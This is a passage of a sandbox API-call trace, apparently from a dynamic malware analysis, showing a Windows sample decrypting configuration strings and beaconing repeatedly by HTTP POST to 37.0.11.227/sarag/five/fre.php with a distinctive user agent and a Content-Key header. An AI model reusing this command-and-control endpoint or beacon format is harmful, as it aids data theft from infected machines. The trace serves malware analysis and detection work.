(lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.878] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0215.886] GetProcessHeap () returned 0x690000 [0215.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0215.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.887] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.888] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.889] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.889] GetProcessHeap () returned 0x690000 [0215.890] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0215.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.897] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.898] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.900] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0215.900] GetProcessHeap () returned 0x690000 [0215.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.901] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0215.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.902] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0215.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.903] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0215.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.904] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0215.904] GetProcessHeap () returned 0x690000 [0215.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0215.905] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0215.905] GetProcessHeap () returned 0x690000 [0215.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0215.905] GetProcessHeap () returned 0x690000 [0215.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0215.906] GetProcessHeap () returned 0x690000 [0215.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0215.906] GetProcessHeap () returned 0x690000 [0215.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0215.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.907] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0215.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0215.965] GetProcessHeap () returned 0x690000 [0215.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0215.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.966] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0215.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.967] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0215.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.967] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0215.967] GetProcessHeap () returned 0x690000 [0215.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0215.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.970] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0215.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.971] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0215.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0215.974] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0215.974] GetProcessHeap () returned 0x690000 [0215.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0215.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.975] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0215.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.976] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0215.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.976] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0215.977] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.977] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0215.977] GetProcessHeap () returned 0x690000 [0215.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0215.977] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0215.977] GetProcessHeap () returned 0x690000 [0215.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0215.977] socket (af=2, type=1, protocol=6) returned 0x530 [0215.978] connect (s=0x530, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0216.004] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0216.004] GetProcessHeap () returned 0x690000 [0216.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0216.004] GetProcessHeap () returned 0x690000 [0216.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0216.004] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.006] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.007] GetProcessHeap () returned 0x690000 [0216.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0216.007] GetProcessHeap () returned 0x690000 [0216.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.007] GetProcessHeap () returned 0x690000 [0216.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0216.007] GetProcessHeap () returned 0x690000 [0216.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0216.008] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.008] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.008] GetProcessHeap () returned 0x690000 [0216.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0216.009] GetProcessHeap () returned 0x690000 [0216.009] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.009] send (s=0x530, buf=0x6ab500*, len=242, flags=0) returned 242 [0216.010] send (s=0x530, buf=0x6aba40*, len=159, flags=0) returned 159 [0216.010] GetProcessHeap () returned 0x690000 [0216.010] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0216.010] recv (in: s=0x530, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0216.075] GetProcessHeap () returned 0x690000 [0216.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0216.076] GetProcessHeap () returned 0x690000 [0216.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0216.076] GetProcessHeap () returned 0x690000 [0216.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0216.076] GetProcessHeap () returned 0x690000 [0216.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0216.077] closesocket (s=0x530) returned 0 [0216.077] GetProcessHeap () returned 0x690000 [0216.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0216.077] GetProcessHeap () returned 0x690000 [0216.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.078] GetProcessHeap () returned 0x690000 [0216.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.078] GetProcessHeap () returned 0x690000 [0216.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0216.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xea4) returned 0x530 [0216.080] Sleep (dwMilliseconds=0xea60) [0216.081] GetProcessHeap () returned 0x690000 [0216.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0216.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.084] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0216.095] GetProcessHeap () returned 0x690000 [0216.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0216.096] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.096] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0216.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.097] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.098] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.098] GetProcessHeap () returned 0x690000 [0216.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0216.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.099] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0216.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.100] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0216.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.101] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0216.101] GetProcessHeap () returned 0x690000 [0216.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0216.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.102] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.103] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.104] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.105] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.105] GetProcessHeap () returned 0x690000 [0216.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0216.105] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.105] GetProcessHeap () returned 0x690000 [0216.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0216.105] GetProcessHeap () returned 0x690000 [0216.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0216.106] GetProcessHeap () returned 0x690000 [0216.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0216.106] GetProcessHeap () returned 0x690000 [0216.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0216.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.111] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0216.119] GetProcessHeap () returned 0x690000 [0216.119] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0216.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.121] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.123] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.124] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.124] GetProcessHeap () returned 0x690000 [0216.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0216.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.128] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0216.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.129] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0216.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.130] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0216.130] GetProcessHeap () returned 0x690000 [0216.130] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0216.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.131] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0216.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.133] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0216.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.134] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0216.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.135] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0216.135] GetProcessHeap () returned 0x690000 [0216.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0216.135] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0216.135] GetProcessHeap () returned 0x690000 [0216.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0216.135] socket (af=2, type=1, protocol=6) returned 0x534 [0216.135] connect (s=0x534, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0216.168] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0216.178] GetProcessHeap () returned 0x690000 [0216.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0216.178] GetProcessHeap () returned 0x690000 [0216.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0216.180] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.181] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.181] GetProcessHeap () returned 0x690000 [0216.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0216.181] GetProcessHeap () returned 0x690000 [0216.181] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.181] GetProcessHeap () returned 0x690000 [0216.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0216.181] GetProcessHeap () returned 0x690000 [0216.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0216.182] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.183] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.183] GetProcessHeap () returned 0x690000 [0216.183] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0216.183] GetProcessHeap () returned 0x690000 [0216.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.183] send (s=0x534, buf=0x6ad508*, len=242, flags=0) returned 242 [0216.184] send (s=0x534, buf=0x6aba40*, len=159, flags=0) returned 159 [0216.184] GetProcessHeap () returned 0x690000 [0216.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0216.184] recv (in: s=0x534, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0216.284] GetProcessHeap () returned 0x690000 [0216.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0216.285] GetProcessHeap () returned 0x690000 [0216.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.285] GetProcessHeap () returned 0x690000 [0216.285] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0216.286] GetProcessHeap () returned 0x690000 [0216.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0216.286] closesocket (s=0x534) returned 0 [0216.286] GetProcessHeap () returned 0x690000 [0216.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0216.286] GetProcessHeap () returned 0x690000 [0216.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0216.289] GetProcessHeap () returned 0x690000 [0216.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0216.289] GetProcessHeap () returned 0x690000 [0216.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0216.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb24) returned 0x534 [0216.291] Sleep (dwMilliseconds=0xea60) [0216.292] GetProcessHeap () returned 0x690000 [0216.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0216.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.294] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0216.308] GetProcessHeap () returned 0x690000 [0216.308] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0216.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.311] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.312] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.313] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.313] GetProcessHeap () returned 0x690000 [0216.313] HeapFree 